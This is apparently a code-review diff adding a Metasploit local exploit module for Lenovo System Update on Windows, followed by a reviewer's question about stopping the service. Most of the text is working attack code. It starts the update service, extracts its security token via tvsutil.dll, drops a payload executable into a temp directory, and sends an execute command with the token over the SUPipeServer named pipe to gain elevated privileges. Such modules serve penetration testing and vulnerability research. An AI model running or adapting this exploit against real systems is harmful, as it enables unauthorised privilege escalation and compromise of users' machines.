modules/exploits/windows/local/lenovo_systemupdate.rb

```diff
@@ -0,0 +1,193 @@
+      return false
+    end
+
+    # Then we send the real command
+    w = client.railgun.kernel32.WriteFile(handle, command, command.length, 4, nil)
+
+    if w['return'] == false
+      print_error('The was an error writing to pipe, check permissions')
+      return false
+    end
+
+    true
+  end
+
+
+  def get_security_token(lenovo_directory)
+    if not client.railgun.get_dll('tvsutil') then
+      client.railgun.add_dll('tvsutil', "#{lenovo_directory}\\tvsutil.dll")
+      client.railgun.add_function("tvsutil", "GetSystemInfoData", "DWORD", [["PWCHAR","systeminfo","out"]], windows_name = nil, calling_conv = "cdecl")
+    end
+
+    dll_response = client.railgun.tvsutil.GetSystemInfoData(256)
+    return dll_response['systeminfo'][0,40]
+  end
+
+
+  def config_service(lenovo_directory, option)
+    cmd_exec(lenovo_directory + "ConfigService.exe #{option}")
+  end
+
+
+  def exploit
+    if is_system?
+      fail_with(Failure::NoTarget, 'Session is already elevated')
+    end
+
+    su_directory = service_info('SUService')[:path][1..-15]
+
+    print_status("Starting service via ConfigService.exe")
+    config_service(su_directory, "start")
+    print_status("Giving the service some time to start...")
+    sleep(datastore['sleep'])
+
+    print_status("Getting security token...")
+    token = get_security_token(su_directory)
+    vprint_good("Security token is: #{token}")
+
+
+    if datastore['WritableDir'] and not datastore['WritableDir'].empty?
+      temp_dir = datastore['WritableDir']
+    else
+      temp_dir = client.sys.config.getenv('TEMP')
+    end
+
+    print_status("Using #{temp_dir} to drop malicious exe")
+
+    begin
+      cd(temp_dir)
+    rescue Rex::Post::Meterpreter::RequestError
+      session.railgun.kernel32.CloseHandle(handle)
+      fail_with(Failure::BadConfig, "Failed to use the #{temp_dir} directory")
+    end
+
+    print_status('Writing malicious exe to remote filesystem')
+    write_path = pwd
+    exe_name = "#{rand_text_alpha(10 + rand(10))}.exe"
+
+    begin
+      write_file(exe_name, generate_payload_exe)
+      register_file_for_cleanup("#{write_path}\\#{exe_name}")
+    rescue Rex::Post::Meterpreter::RequestError
+      session.railgun.kernel32.CloseHandle(handle)
+      fail_with(Failure::Unknown, "Failed to drop payload into #{temp_dir}")
+    end
+
+    print_status('Sending Execute command to update service')
+
+    begin
+      write_res = write_named_pipe("\\\\.\\pipe\\SUPipeServer", "/execute #{exe_name} /arguments /directory #{write_path} /type COMMAND /securitycode #{token}")
+    rescue Rex::Post::Meterpreter::RequestError
+      session.railgun.kernel32.CloseHandle(handle)
+      fail_with(Failure::Unknown, 'Failed to write to pipe')
+    end
+
+    unless write_res
+      fail_with(Failure::Unknown, 'Failed to write to pipe')
+    end
+
+    print_status("Stopping service via ConfigService.exe")
+    config_service(su_directory, "stop")
```

Comment:
Should the service be stopped every time? Perhaps it's better to only shut the service down when you were responsible for starting it up in the first place?